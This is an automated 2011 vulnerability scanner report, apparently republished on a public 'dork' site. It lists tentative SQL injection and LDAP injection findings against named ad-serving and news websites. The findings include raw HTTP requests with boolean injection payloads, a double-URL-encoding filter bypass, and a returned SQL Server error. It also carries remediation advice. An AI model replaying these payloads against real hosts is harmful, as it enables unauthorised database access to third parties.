CWE-89, SQL Injection, DORK, SQLi, 2-14-2011, DORK Report

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 09:00:46 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://c5.zedo.com//ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js [REST URL parameter 11]

1.2. http://sitelife.desmoinesregister.com/ver1.0/SiteLifeProxy [name of an arbitrarily supplied request parameter]

1.3. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

1.4. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.7. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.8. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.9. http://www.desmoinesregister.com/scripts/app/js/jquery-1.3.1.min.js [REST URL parameter 2]

1.10. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

2. LDAP injection

2.1. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

2.2. http://tap.rubiconproject.com/oz/sensor [put_2100 cookie]


1. SQL injection  next
There are 10 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://c5.zedo.com//ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js [REST URL parameter 11]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://c5.zedo.com
Path:   //ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js

Issue detail

The REST URL parameter 11 appears to be vulnerable to SQL injection attacks. The payloads 42801041%20or%201%3d1--%20 and 42801041%20or%201%3d2--%20 were each submitted in the REST URL parameter 11. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET //ads2/k/889025/4381/172/0/305004506/305004506//0/305/91642801041%20or%201%3d1--%20//1000003/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=4506/2941/1;s=916;d=17;w=720;h=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 1

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 1729344673
Cache-Control: max-age=2592000
Expires: Wed, 16 Mar 2011 14:42:47 GMT
Date: Mon, 14 Feb 2011 14:42:47 GMT
Connection: close
Content-Length: 2165


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
</A>")








Request 2

GET //ads2/k/889025/4381/172/0/305004506/305004506//0/305/91642801041%20or%201%3d2--%20//1000003/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=4506/2941/1;s=916;d=17;w=720;h=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 269055336
Cache-Control: max-age=2591996
Expires: Wed, 16 Mar 2011 14:42:43 GMT
Date: Mon, 14 Feb 2011 14:42:47 GMT
Connection: close
Content-Length: 2529


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
</A>")






var zzllnw = new Image();
var zzxads = new Image();
if ((Math.floor(Math.random()*1000000)%9)==0) {
zzllnw.src='http://l1.zedo.com/log/p.gif?a=27536;c=101000000;x=3840;n=101;e=i;i=0;s=0;z='+Math.random()+';logdomain=l1.zedo.com';
zzxads.src='http://xads.zedo.com/ads2/p/l?a=27535;c=101000000;x=3840;n=101;e=i;i=0;s=0;z='+Math.random()+';logdomain=l1.zedo.com';
}



1.2. http://sitelife.desmoinesregister.com/ver1.0/SiteLifeProxy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sitelife.desmoinesregister.com
Path:   /ver1.0/SiteLifeProxy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20467713'%20or%201%3d1--%20 and 20467713'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ver1.0/SiteLifeProxy?sid=sitelife.DesMoinesRegister.com&120467713'%20or%201%3d1--%20=1 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: public, max-age=86400
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 15 Feb 2011 10:07:23 GMT
Last-Modified: Mon, 14 Feb 2011 10:07:23 GMT
ETag: -726392143
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Set-Cookie: anonId=a1694d2b-4620-4b12-92ae-a550aea084e5; domain=desmoinesregister.com; expires=Tue, 14-Feb-2012 14:54:14 GMT; path=/
Date: Mon, 14 Feb 2011 14:54:14 GMT
Content-Length: 102317

//multi site enabled -- sid: sitelife.desmoinesregister.com
document.write("<link href='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeCss?sid=sitelife.desmoinesregister.com' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeScripts?sid=sitelife.desmoinesregister.com'></script>");
   document.write("<link href='http://www.desmoinesregister.com/gcicommonfiles/sr/css/pluck.css' rel='stylesheet' type='text/css' />");

///<summary>constructor to create a new SiteLifeProxy</summary>
function SiteLifeProxy(url) {
// User Configurable Properties - these can be set at any time

// your apiKey, this value must be set!
this.apiKey = null;

this.siteLifeDomainOverride = null;
this.siteLifeServerBaseOverride = null;
this.customerCSSOverride = null;
this.customerForumPagePathOverride = null;
this.gcid = "Widgets1.0";

// sniff the browser for custom behaviors
this.__isExplorer = navigator.userAgent.toLowerCase().indexOf('msie') != -1;
this.__isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1;
this.__isMac = navigator.platform.toLowerCase().indexOf('mac') != -1;
this.__isMacIE = this.__isMac && this.__isExplorer;

// if enabled, spit out d
...[SNIP]...

Request 2

GET /ver1.0/SiteLifeProxy?sid=sitelife.DesMoinesRegister.com&120467713'%20or%201%3d2--%20=1 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4081535073; path=/
Cache-Control: public, max-age=84015
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 15 Feb 2011 10:34:37 GMT
Last-Modified: Mon, 14 Feb 2011 10:34:37 GMT
ETag: -1742467064
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm11l3pluckcom
Date: Mon, 14 Feb 2011 14:54:15 GMT
Content-Length: 102317

//multi site enabled -- sid: sitelife.desmoinesregister.com
document.write("<link href='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeCss?sid=sitelife.desmoinesregister.com' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeScripts?sid=sitelife.desmoinesregister.com'></script>");
   document.write("<link href='http://www.desmoinesregister.com/gcicommonfiles/sr/css/pluck.css' rel='stylesheet' type='text/css' />");

///<summary>constructor to create a new SiteLifeProxy</summary>
function SiteLifeProxy(url) {
// User Configurable Properties - these can be set at any time

// your apiKey, this value must be set!
this.apiKey = null;

this.siteLifeDomainOverride = null;
this.siteLifeServerBaseOverride = null;
this.customerCSSOverride = null;
this.customerForumPagePathOverride = null;
this.gcid = "Widgets1.0";

// sniff the browser for custom behaviors
this.__isExplorer = navigator.userAgent.toLowerCase().indexOf('msie') != -1;
this.__isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1;
this.__isMac = navigator.platform.toLowerCase().indexOf('mac') != -1;
this.__isMacIE = this.__isMac && this.__isExplorer;

// if enabled, spit out debug information through alert()
this.debug = false;

// used to track the id of the handler expecting the results from the immediately preceeding method invocation
// this is used only for test
...[SNIP]...
1.3. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1197 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1197 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954'%20and%201%3d1--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:47 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 14:49:47 GMT; Path=/
Set-Cookie: dq=43|5|38|0; Expires=Tue, 14-Feb-2012 14:49:47 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954'%20and%201%3d2--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:47 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.4. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the adRotationId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047%2527&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:56 GMT
Expires: Mon, 14 Feb 2011 01:41:57 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRTSCDC=MDJLPDEAADPMDJOHFMBJCMJL; path=/
X-Powered-By: ASP.NET
Content-Length: 1401
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adrotat
...[SNIP]...
1.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the bannerCreativeAdModuleId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772%2527 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
